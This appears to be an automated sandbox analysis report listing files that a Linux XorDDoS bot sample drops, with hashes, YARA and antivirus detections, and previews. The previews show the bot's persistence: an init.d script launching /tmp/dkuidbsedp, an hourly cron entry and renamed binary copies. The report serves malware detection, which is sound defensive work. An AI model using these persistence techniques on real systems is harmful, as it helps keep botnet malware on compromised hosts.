Reputation:	moderate, very likely benign file
Preview:	/3 * * * root /etc/cron.hourly/gcc.sh.

/etc/init.d/.depend.boot

Process:	/usr/lib/insserv/insserv
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1380
Entropy (8bit):	4.6286085863457025
Encrypted:	false
SSDEEP:	24:KcR684NIwOkJVARL9Eg3U3PX2xRmbUtOeAyh1ZFDSYpY3dOUwZlY:VR6843OkjARLq0U3PX2xYwtOQh1vDTp8
MD5:	5B62F52693F19BAD0D1373AB955F17B8
SHA1:	3865ED303BD83951D0D69D87A6290F120A937C2E
SHA-256:	9026F82085CF03BE408767439E4FD595F266FE6F11ECC4A3AF7F0555ED358196
SHA-512:	E0015AA580EAAFFF64D59F666FDC91280AAC50C10D5189A13B376E3C9DC71A0FE019D7EE05351F1136F65F5F1CAE6C58D781CBA2E073D57E323629BF5137BE25
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	TARGETS = console-setup resolvconf alsa-utils mountkernfs.sh ufw plymouth-log hostname.sh lm-sensors screen-cleanup pppd-dns apparmor x11-common udev keyboard-setup mountdevsubfs.sh brltty procps qemu-kvm cryptdisks cryptdisks-early hwclock.sh open-iscsi networking iscsid checkroot.sh lvm2 urandom checkfs.sh mountall.sh mountall-bootclean.sh bootmisc.sh kmod mountnfs.sh checkroot-bootclean.sh mountnfs-bootclean.sh.INTERACTIVE = console-setup udev keyboard-setup cryptdisks cryptdisks-early checkroot.sh checkfs.sh.udev: mountkernfs.sh.keyboard-setup: mountkernfs.sh udev.mountdevsubfs.sh: mountkernfs.sh udev.brltty: mountkernfs.sh udev.procps: mountkernfs.sh udev.qemu-kvm: mountkernfs.sh udev.cryptdisks: checkroot.sh cryptdisks-early udev lvm2.cryptdisks-early: checkroot.sh udev.hwclock.sh: mountdevsubfs.sh.open-iscsi: networking iscsid.networking: resolvconf mountkernfs.sh urandom procps.iscsid: networking.checkroot.sh: hwclock.sh mountdevsubfs.sh hostname.sh keyboard-setup.lvm2: cryptdi

/etc/init.d/.depend.start

Process:	/usr/lib/insserv/insserv
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1699
Entropy (8bit):	4.570338756950413
Encrypted:	false
SSDEEP:	48:ZupBfNySAzo1kWY27ZGme/9/n2UPBL+/9/n2UPBLo/9/n2UPBL8h/9/n2UPBLM:gxWo1427keUPYeUPGeUPOeUP6
MD5:	026A5D367A6DD0B13565C2143825C91E
SHA1:	BE8CF98A85484FFB9C071CBD2BDCFADF746040A6
SHA-256:	958D704A53DC3488623A197912973D6C40F7E6FE5FBB509ED2DF228F593743D5
SHA-512:	573B79EBF6CF5926C58FB439B3917D6907A1020BA1737C3D50285D7F3C78559EAC4FFBB9D5E0463E28D83F6E9380C7861A6A3073572BF52F41EEC576DEC8A605
Malicious:	true
Reputation:	low
Preview:	TARGETS = rsyslog unattended-upgrades open-vm-tools lvm2-lvmetad uuidd lxd lvm2-lvmpolld lxcfs dkuidbsedp killprocs binfmt-support apport mdadm dbus speech-dispatcher hddtemp kerneloops irqbalance single whoopsie rsync ssh acpid lightdm bluetooth avahi-daemon cups-browsed saned plymouth grub-common ondemand rc.local.INTERACTIVE =.mdadm: rsyslog.dbus: rsyslog.speech-dispatcher: rsyslog.hddtemp: rsyslog.kerneloops: rsyslog.irqbalance: rsyslog.single: killprocs dkuidbsedp.whoopsie: rsyslog.rsync: rsyslog.ssh: rsyslog.acpid: rsyslog.lightdm: dbus acpid.bluetooth: rsyslog dbus.avahi-daemon: dbus rsyslog.cups-browsed: rsyslog.saned: rsyslog dbus.plymouth: rsyslog mdadm unattended-upgrades open-vm-tools cups-browsed lvm2-lvmetad uuidd dbus speech-dispatcher lxd hddtemp kerneloops lightdm bluetooth irqbalance lvm2-lvmpolld avahi-daemon lxcfs dkuidbsedp saned whoopsie rsync ssh acpid binfmt-support apport.grub-common: rsyslog mdadm unattended-upgrades open-vm-tools cups-browsed lvm2-lvmetad uui

/etc/init.d/.depend.stop

Process:	/usr/lib/insserv/insserv
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1690
Entropy (8bit):	4.52194295219339
Encrypted:	false
SSDEEP:	48:3Yu8rBj1G4GJ/suwT2UKGhuw2zOsuwK2UPOiNQh/4uwHFn2U5wT:M1iUJeZU1cU0
MD5:	7897338A208ABF2E5C95E7994A24F8C8
SHA1:	185E660978A050BD66B62C6AF44695251A373390
SHA-256:	7143B8292EB1C2476411ECA94A4A67E5A166C9FB916724B3458247D1C0E1F5CB
SHA-512:	F322DB116C7DE93E68D9709B8E2CE8163BC1E0BEB264D5D178815DB839FFB3E88AF4C17B4095BFB60A579B103CE48D67B1A257CA3394FCFD46FDA97A473C2632
Malicious:	true
Reputation:	low
Preview:	TARGETS = atd network-manager cups anacron cron unattended-upgrades open-vm-tools lvm2-lvmetad uuidd lxd lvm2-lvmpolld lxcfs mdadm resolvconf speech-dispatcher hddtemp alsa-utils kerneloops irqbalance ufw whoopsie lightdm bluetooth cups-browsed saned plymouth open-iscsi urandom avahi-daemon iscsid sendsigs rsyslog umountnfs.sh hwclock.sh networking umountfs cryptdisks cryptdisks-early umountroot mdadm-waitidle halt reboot.avahi-daemon: cups-browsed saned.iscsid: open-iscsi.sendsigs: atd mdadm open-iscsi unattended-upgrades open-vm-tools cups-browsed plymouth uuidd network-manager speech-dispatcher lxd hddtemp iscsid alsa-utils kerneloops lightdm bluetooth irqbalance avahi-daemon lxcfs.rsyslog: atd mdadm sendsigs cups-browsed network-manager speech-dispatcher hddtemp kerneloops bluetooth irqbalance avahi-daemon cups saned whoopsie.umountnfs.sh: atd unattended-upgrades open-vm-tools rsyslog cups-browsed plymouth uuidd network-manager speech-dispatcher lxd hddtemp sendsigs alsa-utils kern

/etc/init.d/dkuidbsedp

Process:	/tmp/dkuidbsedp
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.141446654602005
Encrypted:	false
SSDEEP:	6:hUtoFdU97cvR8sKheJ6iWcvwBE21YJvmNeMwhNWcvR61DzRIEOucv/h6Mz3OucvG:61cz6iWc4BEMO1NWcazunucnhz+ucnu
MD5:	7A817B22D50158CA8AE6A95BFCEA4CB2
SHA1:	D4B69FDF8065821E78660C89007E7AC2FD63405F
SHA-256:	4550E0BA3744D665E4D38A51D18A97DBDF586CADE3D8BCBBE99CFD99CEFA5407
SHA-512:	E997F9AE31620D8FFC482B4F2B69B328D0827349DA12CA75FDE1AE6C6FDCDF69E3FDA787AA0206DFF4E8E4CD832406F39E301E8D78F1E74794090EBA4BD5E0BB
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# chkconfig: 12345 90 90.# description: dkuidbsedp.### BEGIN INIT INFO.# Provides:..dkuidbsedp.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.dkuidbsedp.### END INIT INFO.case $1 in.start)../tmp/dkuidbsedp..;;.stop)..;;.*)../tmp/dkuidbsedp..;;.esac.

/lib/libudev.so

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244401838455305
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Am:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91b
MD5:	37542894283B8851469753DE69C0BCDC
SHA1:	0480F29F346B400B989D88798B4418D5EF0FD3D9
SHA-256:	7C0D5161AD70ACF5B98B640089D23ADA44935DCD7240C64D43F7CC54D853ACB1
SHA-512:	0CE2FCC97494EAB5FEEC72AB21163E1AC0C6AE9182F6D366DD7E5A2BCB00C1C46276EB4504FA09B79D258113881A2EBB5FE942642F88F738B68DE83D9DFFE71F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /lib/libudev.so, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /lib/libudev.so, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /lib/libudev.so, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/run/gcc.pid

Process:	/tmp/dkuidbsedp
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.116729296672174
Encrypted:	false
SSDEEP:	3:wR9XWhd:D3
MD5:	C6CF13C590675674064D4A7C0AB84FA1
SHA1:	8CFE8700A85AEAA6DDABAC76A331F230F6F7CC23
SHA-256:	C04DDB20EFDFC8F2EF83D32C536B4A82BE719478EAD67421594C704D86F76CE3
SHA-512:	71DBE1DD3BC055CDD6792BFEC48D96A8157CB3CD4E9A8657CF1F126E58A574B974BEF6A69F5B3FBFE9BA6E498964045277C9CDA3938A5897AD5147273FF7C996
Malicious:	false
Reputation:	low
Preview:	vcgktyioiaixliwssuhhjmnsuaneafuy

/usr/bin/kmavqzvhro

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244432979030593
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A5:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91K
MD5:	A39F4DBBA50225792BC678E0AE044EF5
SHA1:	0204D2021105C16CD3C155FF22C5B33AFA5C3404
SHA-256:	13D0FDFF1F094DA4566B057388FE27611436CC9B702C68BDBC82311260A993D3
SHA-512:	544E322185FBC14DD30F99953A9962B4A04F479115C23BD2CBD9C1BBB03881822E6A602510B9391F64C0E9DB4681B6D058E3FA9EA37E0CE8B2E72EF3E17CD826
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/kmavqzvhro, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/kmavqzvhro, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/kmavqzvhro, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/qjfxtxsijs

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244425260071684
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A/:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91c
MD5:	446F97EE9842B394ED1A50FE59B5C7D8
SHA1:	CDD7C5410862907D9880CF0D45B9919CB4F327FD
SHA-256:	7F09A82BA1B5D00BFC90F411D72B126FC68D5D73103D30F4DE5F389F62D6C547
SHA-512:	D166EE66CF390741E7509B2A04BF3288588C491BBC4029ED000C375E6A4340B25A512714A5BB8CB581137271B984A401C6B9E6A452A868F0B81EE7E85F350631
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qjfxtxsijs, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/qjfxtxsijs, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/qjfxtxsijs, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/qvilroogsz

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244432171893418
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Al:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/912
MD5:	ADA71B4B71B57B78680A7D8EFD5C3382
SHA1:	34270D2DCE6EDE8ADECFBED34C604BF702AC7079
SHA-256:	D0E86CDF3D933D77FA2EF0B41695D9B56FE16B01E24EB6C92AD7C49C709B8CB4
SHA-512:	B74F5922B763D90A0DDAEF7FFEECC558E830E4412B463495B0009698142202FC6A8CFD1A680F22F1E88A9403698793DB06E462B8EBD4119A586B21084C5A1827
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qvilroogsz, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/qvilroogsz, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/qvilroogsz, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/tudlcvpgbc

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244438941254228
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A3:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91A
MD5:	E9F6680F4483FB8BC5FB7E9E55222BD7
SHA1:	64E9235802CC52E0699E1058C6F89124C895B2FA
SHA-256:	D15E0A037E8B898A6D3EF025A17E27E8A7E2315C8EB964CE84031A63EEFC17D1
SHA-512:	1757862DF270B77F3F71BAF64EA75F43476D12977C0F8525C384A17F1E6F0EE7C20D038ADF376AA809113E47FE01CE2C610EBD50A1EAA70011ECBC352B65E551
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/tudlcvpgbc, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/tudlcvpgbc, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/tudlcvpgbc, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/txflbjqefg

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.24444078994817
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91h
MD5:	75E59FA1A4720187F898957348FDA126
SHA1:	545040C76ADC4F6CF4C0441D4B9F13343697152C
SHA-256:	5F8ADD858E1ECCD64CC16024EE2C2070CD801F5CDEC3E08B2E6E1C3E9C9C8E2C
SHA-512:	7E21E5CFAC69075898DEF937BA62E2FC3AF52D1D55C7529884724DDFDA3B058E821AD9E071662281A173D0C46017CB2485A8EF7C208ECDF3971BAFC73FF46887
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/txflbjqefg, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/txflbjqefg, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/txflbjqefg, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/wgpgdetjwe

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244444901105289
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1A5:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91a
MD5:	A23FDDCEEEC8B0B1803AFA96B34F57DE
SHA1:	2FF2BEE4B6C2427C0DA39E973F9E07A816798655
SHA-256:	735BBBE4FF7FE6133ADA43A8D48F38623C20555CBC10D1B4DDD22E7845365005
SHA-512:	BF7240780E83CAD3DB88C2E2674CDF8C91B6A751553A2358CDE135BBAF8688C64471F05AAB0D22C489EEFBF2CE80548583CF9BFF6AE19F603B344B676E10F212
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wgpgdetjwe, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wgpgdetjwe, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wgpgdetjwe, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/whtzopaggc

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244433121826029
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AX:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91A
MD5:	3FA295FF1F014FB5DD96C4434909EC39
SHA1:	5F0F098548DD794FBAC3B8894F09F8BF4505AFAF
SHA-256:	F9B05CDFD4B9B4E36CC28CECF759B582F8F8C3AC6715F9453BEB882ED04EB81A
SHA-512:	483FB40613A89E25B77DEB77367551B15F47689480C6601D81BBB64BE1AB24C46CFE61334AD252F5F1B42EAB7DED941FE33BA71E49CA5C36CD1C3B7370B78F5C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/whtzopaggc, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/whtzopaggc, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/whtzopaggc, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/wrfeamwlub

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244435319940656
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Aa:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91p
MD5:	2CC8AEFFC8AF7ADDF44CB78168298206
SHA1:	F2D048E97A2C3C0DC4EA68A875F63263B91166B9
SHA-256:	1E7E7AD5F3F9A06B9735A97EC438FE9923D456DF5C4E526CAFCE8287D8D2E7B7
SHA-512:	F5157BF62D762A8AA0E9EBF16A5240DA041D47A9B1EB336C1845DEA0727DAF6ECBC96DB6F0ECADF2F648C075B729778AE28D4E98A398B6E2EFD0F251D907BA26
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wrfeamwlub, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wrfeamwlub, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wrfeamwlub, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/wyyhrifhaz

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244438122825698
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AD:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/910
MD5:	54DAE078A67E6B3E3DA231442BF638AD
SHA1:	F83ADBED007B877ECD1AB8CA727F1BBD1F0CC231
SHA-256:	16615C96118BBDEE29E964488A97BC41BF7CC67E25F17FA3D197716A37E53813
SHA-512:	508A71EED7EC7EDABAE6A96FBD7AA998BA3B3B904FDA1DF119A42C7F8546D8D25BE1EED93FB2303BFC8244EE0E1D8370C9A4CCBD9E5226B53BC69A6241380A1A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wyyhrifhaz, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wyyhrifhaz, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wyyhrifhaz, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/yfiimchuiz

Process:	/tmp/dkuidbsedp
